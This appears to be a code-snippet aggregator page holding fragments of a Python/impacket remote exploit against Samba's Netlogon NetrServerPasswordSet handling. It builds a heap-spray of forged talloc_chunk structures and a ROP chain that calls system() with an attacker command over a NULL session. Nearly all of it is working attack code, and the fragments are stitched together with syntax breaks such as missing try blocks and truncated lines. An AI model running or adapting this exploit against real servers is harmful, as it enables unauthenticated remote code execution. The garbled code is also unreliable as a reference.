Exemple #1
    def __init__(self):
        self.target = None
        self.dce = None
        sessionKey = '\x00'*16
        # prepare ServerPasswordSet request
        authenticator = nrpc.NETLOGON_AUTHENTICATOR()
        authenticator['Credential'] = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
        authenticator['Timestamp'] = 10

        uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD()
        uasNewPass['Data'] = '\x00'*16

        self.serverName = nrpc.PLOGONSRV_HANDLE()
        # ReferentID field of PrimaryName controls the uninitialized value of creds
        self.serverName.fields['ReferentID'] = 0
        self.accountName = WSTR()

        request = Requester.NetrServerPasswordSet()
        request['PrimaryName'] = self.serverName
        request['AccountName'] = self.accountName
        request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel
        request['ComputerName'] = '\x00'
        request['Authenticator'] = authenticator
        request['UasNewPassword'] = uasNewPass
        self.request = request
def exploit(free_addr, pie=0, destructor=-1, step=0x80):
    pivot = pie + pivot_o
    pop4ret = pie + pop4ret_o
    popebx = pie + popebx_o
    got = pie + got_o
    fmt = pie + fmt_o
    system = pie + system_o
    snprintf = pie + snprintf_o
    bss = pie + bss_o

    if pie != 0:
        destructor = pivot
    # struct talloc_chunk {
    #     struct talloc_chunk *next, *prev;
    #     struct talloc_chunk *parent, *child;
    #     struct talloc_reference_handle *refs; // refs = 0
    #     talloc_destructor_t destructor; // destructor = -1: (No Crash), others: controled EIP
    #     const char *name;
    #     size_t size;
    #     unsigned flags; // magic
    #     void *poo
    # };
    talloc_chunk = l32(0)  # refs => 0
    talloc_chunk += l32(destructor)  # destructor => control EIP
    talloc_chunk += l32(pop4ret)  # pop4ret
    talloc_chunk += 'leet'  #
    talloc_chunk += l32(0xe8150c70)  # flags => magic

    # ebx => got
    rop = l32(popebx) + l32(got)
    # write cmd to bss
    for i in xrange(len(cmd)):
        c = cmd[i]
        rop += l32(snprintf) + l32(pop4ret)
        rop += l32(bss + i) + l32(2) + l32(fmt) + l32(ord(c))
    # system(cmd)
    rop += l32(system) + 'leet' + l32(bss)

    payload = 'deadbeef'
    payload += talloc_chunk * 0x1000 * step
    payload += 'leet' * 2
    payload += rop.ljust(2560, 'C')
    payload += 'cafebabe' + '\0'

    username = ''
    password = ''

    # impacket does not implement NetrServerPasswordSet
    # NetrServerPasswordSet (Opnum 6)
    class NetrServerPasswordSet(NDRCALL):
        opnum = 6
        structure = (
            ('PrimaryName', nrpc.PLOGONSRV_HANDLE),
            ('AccountName', WSTR),
            ('SecureChannelType', nrpc.NETLOGON_SECURE_CHANNEL_TYPE),
            ('ComputerName', WSTR),
            ('Authenticator', nrpc.NETLOGON_AUTHENTICATOR),
            ('UasNewPassword', nrpc.ENCRYPTED_NT_OWF_PASSWORD),

    class NetrServerPasswordSetResponse(NDRCALL):
        structure = (
            ('ReturnAuthenticator', nrpc.NETLOGON_AUTHENTICATOR),
            ('ErrorCode', NTSTATUS),

    nrpc.OPNUMS[6] = (NetrServerPasswordSet, NetrServerPasswordSetResponse)

    # connect to target
    rpctransport = transport.DCERPCTransportFactory(
        r'ncacn_np:%s[\PIPE\netlogon]' % host)
    rpctransport.set_credentials('', '')  # NULL session
    # impacket has a problem with SMB2 dialect against samba4
    # force to 'NT LM 0.12' only
    rpctransport.preferred_dialect('NT LM 0.12')

    dce = rpctransport.get_dce_rpc()

    sessionKey = '\x00' * 16

    # prepare ServerPasswordSet request
    authenticator = nrpc.NETLOGON_AUTHENTICATOR()
    authenticator['Credential'] = nrpc.ComputeNetlogonCredential(
        '12345678', sessionKey)
    authenticator['Timestamp'] = 10

    uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD()
    uasNewPass['Data'] = payload

    primaryName = nrpc.PLOGONSRV_HANDLE()
    # ReferentID field of PrimaryName controls the uninitialized value of creds in ubuntu 12.04 32bit
    primaryName.fields['ReferentID'] = free_addr

    request = NetrServerPasswordSet()
    request['PrimaryName'] = primaryName
    request['AccountName'] = username + '\x00'
        'SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel
    request['ComputerName'] = host + '\x00'
    request['Authenticator'] = authenticator
    request['UasNewPassword'] = uasNewPass

    DCERPCSessionError = nrpc.DCERPCSessionError
        resp = dce.request(request)
        print("no error !!! error code: 0xc0000225 or 0xc0000034 is expected")
        print("seems not vulnerable")
        # resp.dump()
        return 2
    except DCERPCSessionError as e:
        # expect error_code: 0xc0000225 - STATUS_NOT_FOUND
        # expect error_code: 0xc0000034 - STATUS_OBJECT_NAME_NOT_FOUND
        print("seems not vulnerable")
        # resp.dump()
        return 2
    except impacket.nmb.NetBIOSError as e:
        # print 'exception occured'
        if e.args[0] == 'Error while reading from remote':
            # print("connection lost!!!\nmight be vulnerable")
            return 1
    except AttributeError:
        # print("exception")
        return 0
#resp = nrpc.hNetrServerReqChallenge(dce, NULL, target + '\x00', '12345678')
#serverChallenge = resp['ServerChallenge']
#sessionKey = nrpc.ComputeSessionKeyStrongKey(password, '12345678', serverChallenge, None)
sessionKey = '\x00' * 16

# prepare ServerPasswordSet request
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(
    '12345678', sessionKey)
authenticator['Timestamp'] = 10

uasNewPass['Data'] = '\x00' * 16

primaryName = nrpc.PLOGONSRV_HANDLE()
# ReferentID field of PrimaryName controls the uninitialized value of creds in ubuntu 12.04 32bit
primaryName.fields['ReferentID'] = 0x41414141

request = NetrServerPasswordSet()
request['PrimaryName'] = primaryName
request['AccountName'] = username + 'a\x00'
    'SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel
request['ComputerName'] = target + '\x00'
request['Authenticator'] = authenticator
request['UasNewPassword'] = uasNewPass